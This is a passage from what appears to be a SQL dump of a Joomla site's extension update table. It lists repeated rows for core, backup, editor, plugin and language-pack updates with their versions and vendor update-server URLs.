package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28481,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(28482,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.6','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-6			\n		',''),(28483,129,0,'JCE 2.9.5','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.5','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-5-released',''),(28484,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28485,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28486,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28487,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28488,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28489,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28490,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28491,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28492,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28493,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28494,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28495,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28496,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28497,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28498,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28499,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28500,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(28501,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(28502,3,0,'French','','pkg_fr-FR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(28503,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(28504,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(28505,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(28506,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(28507,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(28508,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(28509,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(28510,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(28511,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(28512,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(28513,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(28514,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(28515,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(28516,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(28517,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(28518,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(28519,3,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(28520,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(28521,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(28522,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(28523,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(28524,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(28525,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(28526,3,0,'English US','','pkg_en-US','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(28527,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28528,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28529,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(28530,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(28531,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(28532,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(28533,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(28534,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(28535,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(28536,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(28537,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(28538,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(28539,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(28540,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(28541,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(28542,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(28543,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(28544,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(28545,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(28546,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(28547,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(28548,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(28549,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(28550,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(28551,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(28552,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(28553,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(28554,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(28555,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(28556,20,0,'RokBooster Plugin','','rokbooster','plugin','system',0,'1.1.19','0802','http://updates.rockettheme.com/joomla/287/cb577720','',''),(28557,20,0,'RokBox Plugin','','rokbox','plugin','system',0,'2.0.16','0802','http://updates.rockettheme.com/joomla/301/dfc993d8','',''),(28558,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(28559,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(28560,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(28561,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(28562,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(28563,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(28564,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(28565,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(28566,57,0,'French','','pkg_fr-FR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(28567,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(28568,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(28569,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(28570,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(28571,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(28572,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.25.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(28573,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(28574,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(28575,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(28576,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(28577,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(28578,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(28579,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(28580,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(28581,57,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(28582,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(28583,57,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/nb-NO_details.xml','',''),(28584,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(28585,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(28586,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(28587,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(28588,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(28589,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(28590,57,0,'English US','','pkg_en-US','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(28591,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(28592,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(28593,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(28594,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(28595,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(28596,57,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(28597,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(28598,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(28599,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(28600,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(28601,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(28602,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(28603,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(28604,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(28605,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(28606,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(28607,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(28608,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(28609,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(28610,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(28611,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(28612,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(28613,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(28614,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.26.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(28615,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(28616,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28617,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(28618,122,0,'Google Structured Data Free','Google Structured Data Free','gsd','plugin','system',0,'4.8.6','','https://static.tassos.gr/update/gsdfree?type=.xml','\n			https://www.tassos.gr/releases/google-structured-data-markup/google-structured-data-markup-4-8-6			\n		',''),(28619,129,0,'JCE 2.9.5','Installation package for Joomla! 3.x and 4.x','pkg_jce','package','',0,'2.9.5','','https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml','https://www.joomlacontenteditor.net/news/jce-pro-2-9-5-released',''),(28620,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28621,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28622,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28623,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28624,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28625,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28626,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28627,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28628,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28629,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28630,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28631,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28632,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28633,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28634,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28635,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28636,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28637,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28638,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28639,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28640,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28641,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28642,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28643,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28644,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28645,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28646,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28647,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28648,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28649,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28650,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28651,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28652,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28653,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28654,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28655,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28656,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28657,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28658,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28659,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28660,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28661,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28662,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28663,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28664,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28665,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28666,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28667,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28668,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28669,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28670,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28671,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28672,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28673,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28674,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28675,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28676,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28677,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28678,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28679,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28680,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28681,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28682,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28683,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28684,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28685,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28686,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'8.0.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/8-0-4.html',''),(28687,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28688,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28689,1,0,'Joomla','','joomla','file','',0,'3.9.26','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(28690,67,0,'Akeeba Backup Core 